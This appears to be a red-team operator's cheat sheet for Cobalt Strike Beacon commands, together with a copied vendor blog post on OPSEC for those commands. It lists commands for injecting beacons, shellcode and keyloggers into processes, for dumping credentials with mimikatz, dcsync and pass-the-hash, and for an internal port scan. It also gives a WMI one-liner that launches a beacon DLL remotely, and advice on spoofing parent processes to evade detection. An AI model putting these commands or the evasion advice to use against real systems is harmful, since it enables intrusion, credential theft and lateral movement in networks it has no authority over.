execute-assembly : run a .net executable as a post-ex job as your current token
inject <PID> <x86/x64> : inject new beacon into process
jobkill <ID>
keylogger <PID> <x86/x64> : inject a keylogger into PID
net [session/share/local/group/etc]
ps : list processes
reg_query [x86/x64] <HIVE\path\to\key> : query specific key in registry
reg_query [x86/x64] <HIVE\path\to\key> <value> : query specific value within a key
shell [cmd] [args] : run cmd with cmd.exe
upload / download <file>
argue [cmd] [fake args] : add cmd to fake args internal list
ppid <ID> : set parent process id
spawnto <x86/x64> [C:\process\to\spawn.exe] : set child process spawned
mimikatz [module::command] <args>
logonpasswords : extracts hashes from LSASS (sekurlsa::logonpasswords)
dsync [domain.fqdn] [DOMAIN\user] : uses lsadump::dsync to extract hashes
pth [DOMAIN\user] [NTLM hash] : uses sekurlsa::pth aka pass the hash
desktop <pid> <x86/x64> <low|high> : stage a VNC server into the memory of the current process and tunnel the connection through beacon
powershell-import </path/script.ps1> : import script into memory in beacon powershell : setup local TCP server, bound to localhost and download the script and execute powerpick : launch function with tifkin_'s powershell, which doesn't start powershell.exe psinject : inject unmanaged ps into process and exec cmd dllinject : inject reflective DLL into process inject <x86/x64> : inject new beacon into process shinject <x86/x64> file.bin : inject shellcode from local file spawn <x86/x64> : spawn new beacon spawnas [DOMAIN\user] dllload </path/script.dll> : load a DLL into process
########################################### ANOTHER ONE #####################
http://blog.cobaltstrike.com/2016/07/06/gettin-down-with-aggressor-script/ https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/DA-Watch.cna https://github.com/Und3rf10w/Aggressor-scripts
portscan 10.42.175.0/26 21,22,23,25,80,443,445,1433,3389,8080,8443
Start Remote Beacon DLL via iwmi
powerpick iwmi -class Win32_Process -name create -ArgumentList "rundll32.exe c:\users\public\libraries\smb_beacon.dll.log0,StartW"
Blog.Cobaltstrike.com - OPSEC Considerations For Beacon Commands
A good operator knows their tools and has an idea of how the tool is accomplishing its objectives on their behalf. This blog post surveys Beacons commands and provides background on which commands inject into remote processes, which commands spawn jobs, and which commands rely on cmd.exe or powershell.exe.
API-only These commands are built-into Beacon and rely on Win32 APIs to meet their objectives.
cd
cp
download
drives
exit
getuid
kerberos_ccache_use
kerberos_ticket_purge
kerberos_ticket_use
jobkill
kill
link
ls
make_token
mkdir
mv
ppid
ps
pwd
rev2self
rm
rportfwd
socks
steal_token
timestomp
unlink
upload
House-keeping Commands The following commands are built into Beacon and exist to configure Beacon or perform house-keeping actions. Some of these commands (e.g., clear, downloads, help, mode, note) do not generate a task for Beacon to execute.
cancel
checkin
clear
downloads
help
jobs
mode dns
mode dns-txt
mode dns6
mode http
note
powershell-import
sleep
socks stop
spawnto
Post-Exploitation Jobs (Process Execution + Remote Process Injection) Many Beacon post-exploitation features spawn a process and inject a capability into that process. Beacon does this for a number of reasons: (i) this protects the agent if the capability crashes, (ii) this scheme makes it seamless for an x86 Beacon to launch x64 post-exploitation tasks. The following commands run as post-exploitation jobs:
browserpivot
bypassuac
covertvpn
dcsync
desktop
elevate
hashdump
keylogger
logonpasswords
mimikatz
net
portscan
powerpick
psinject
pth
screenshot
shspawn
spawn
ssh
ssh-key
wdigest
OPSEC Advice: Use the spawnto command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe (you probably don’t want that). The ppid command will change the parent process these jobs are run under as well.
Process Execution These commands spawn a new process:
execute
runas
runu
OPSEC Advice: The ppid command will change the parent process of commands run by execute. The ppid command does not affect runas or spawnu.
Process Execution: Cmd.exe The shell command depends on cmd.exe.
The pth and getsystem commands get honorable mention here. These commands rely on cmd.exe to pass a token to Beacon via a named pipe.
OPSEC Advice: the shell command uses the COMSPEC environment variable to find the preferred command-line interpreter on Windows. Use Aggressor Script’s &bsetenv function to point COMSPEC to a different cmd.exe location, if needed. Use the ppid command to change the parent process the command-line interpreter is run under. To pth without cmd.exe, execute the pth steps by hand.
Process Execution: PowerShell.exe The following commands launch powershell.exe to perform some task on your behalf.
powershell
spawnas
spawnu
winrm
wmi
OPSEC Advice: Use the ppid command to change the parent process powershell.exe is run under. Be aware, there are alternatives to each of these commands that do not use powershell.exe:
spawnu has runu which runs an arbitrary command under another process.
spawnas has runas which runs an arbitrary command as another user.
powershell has powerpick, this command runs powershell scripts without powershell.exe.
It’s also possible to laterally spread without the winrm and wmi commands. Remote Process Injection
The post-exploitation job commands (previously mentioned) rely on process injection too. The other commands that inject into a remote process are:
dllinject
inject
shinject
Service Creation
The following internal Beacon commands create a service (either on the current host or a remote target) to run a command. These commands use Win32 APIs to create and manipulate services.
getsystem
psexec
psexec_psh
https://github.com/bluscreenofjeff/AggressorScripts/blob/master/powershell.cna https://bluescreenofjeff.com/2016-09-07-adding-easy-guis-to-aggressor-scripts/
https://github.com/ZonkSec/persistence-aggressor-script https://github.com/ZonkSec/persistence-aggressor-script/blob/master/persistence.cna